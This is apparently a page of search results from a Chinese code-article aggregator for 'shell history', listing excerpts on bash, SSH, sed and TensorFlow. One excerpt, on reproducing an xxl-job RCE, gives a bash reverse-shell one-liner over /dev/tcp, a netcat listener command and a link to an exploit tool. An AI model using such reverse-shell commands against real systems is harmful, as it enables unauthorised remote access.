码迷,mamicode.com
首页 >  
搜索关键字:shell history    ( 30916个结果
哪一个 bash 内置命令能够进行数学运算?
bash shell 的内置命令 let 可以进行整型数的数学运算。 #! /bin/bash … … let c=a+b … … ...
分类:其他好文   时间:2020-12-03 11:29:06    阅读次数:4
Linux系统SSH(Secure Shell Protocol)服务
Linux系统SSH(SecureShellProtocol)服务Linux系统SSH(SecureShellProtocol)服务一:什么是SSH服务在数据传输前,SSH会对需要传输的数据进行加密,保证会话安全与会话中传输数据的安全,SSH客户端还包括一个远程拷贝命令scp二:SSH的结构SSH服务由服务端软件(openssh)和客户端(SSH、SecureCRT、Xshell)组成,SSH默认
分类:系统相关   时间:2020-12-02 12:42:55    阅读次数:14
xxl-job-api-rce复现
bash -i >& /dev/tcp/ip/port 0>&1 服务器监听 nc -lvvp 9999 利用工具 https://github.com/mrknow001/xxl-job-rce bash反弹shell命令 https://www.cnblogs.com/supdon/p/1346 ...
分类:Windows程序   时间:2020-12-02 12:29:31    阅读次数:11
shell创建数据库的脚本
1 !/bin/bash 2 3 4 HOSTNAME="localhost" 5 PORT="3306" 6 USERNAME="root" 7 PASSWORD="1234" 8 DBNAME="mydatabase" 9 10 11 LOGIN_CMD="mysql -h${HOSTNAME} ...
分类:数据库   时间:2020-12-02 12:27:59    阅读次数:12
shell的种类介绍
shell是弱类型语言如何查看linux支持哪些shell:cat/etc/shells
分类:系统相关   时间:2020-12-02 11:57:06    阅读次数:7
shell sed 多行执行多个命令
code macname@localhost Desktop % cat content fox jumps over the lazy dog. fox jumps over the lazy dog. fox jumps over the lazy dog. fox jumps over the ...
分类:系统相关   时间:2020-12-01 12:32:52    阅读次数:24
Ubuntu18开机执行shell命令
1.打开shell终端,输入 sudo vi /etc/rc.local 2.在编辑器里面输入自己要启动的脚本 #!/bin/bash echo "run incar ai program..." cd /opt/robot nohup bash autorobot.sh & 2>/dev/null ...
分类:系统相关   时间:2020-12-01 12:15:17    阅读次数:12
shell 循环打印出文件所有行
code macname@localhost Desktop % cat test.sh while read line;do echo $line; done < a.txt macname@localhost Desktop % macname@localhost Desktop % cat a ...
分类:系统相关   时间:2020-11-30 16:14:46    阅读次数:16
shell 查看本机的Linux版本和内核信息
code macname@localhost Desktop % echo `uname -a` Darwin localhost 19.6.0 Darwin Kernel Version 19.6.0: Thu Oct 29 22:56:45 PDT 2020; root:xnu-6153.141 ...
分类:系统相关   时间:2020-11-30 16:12:29    阅读次数:12
tensorflow2.0——各批次loss、acc及可视化
一、loss、acc提取 有时候我们需要查看每个batch训练时候的损失loss与准确率acc,这样可以帮助我们挑选合适的epoch以及查看模型是否收敛。 Model.fit()在调用时会返回一个History类,这个类的一个属性Historty.history是一个字典,里面就包含了每一个batc ...
分类:其他好文   时间:2020-11-30 16:04:44    阅读次数:7
30916条   上一页 1 ... 39 40 41 42 43 ... 3092 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!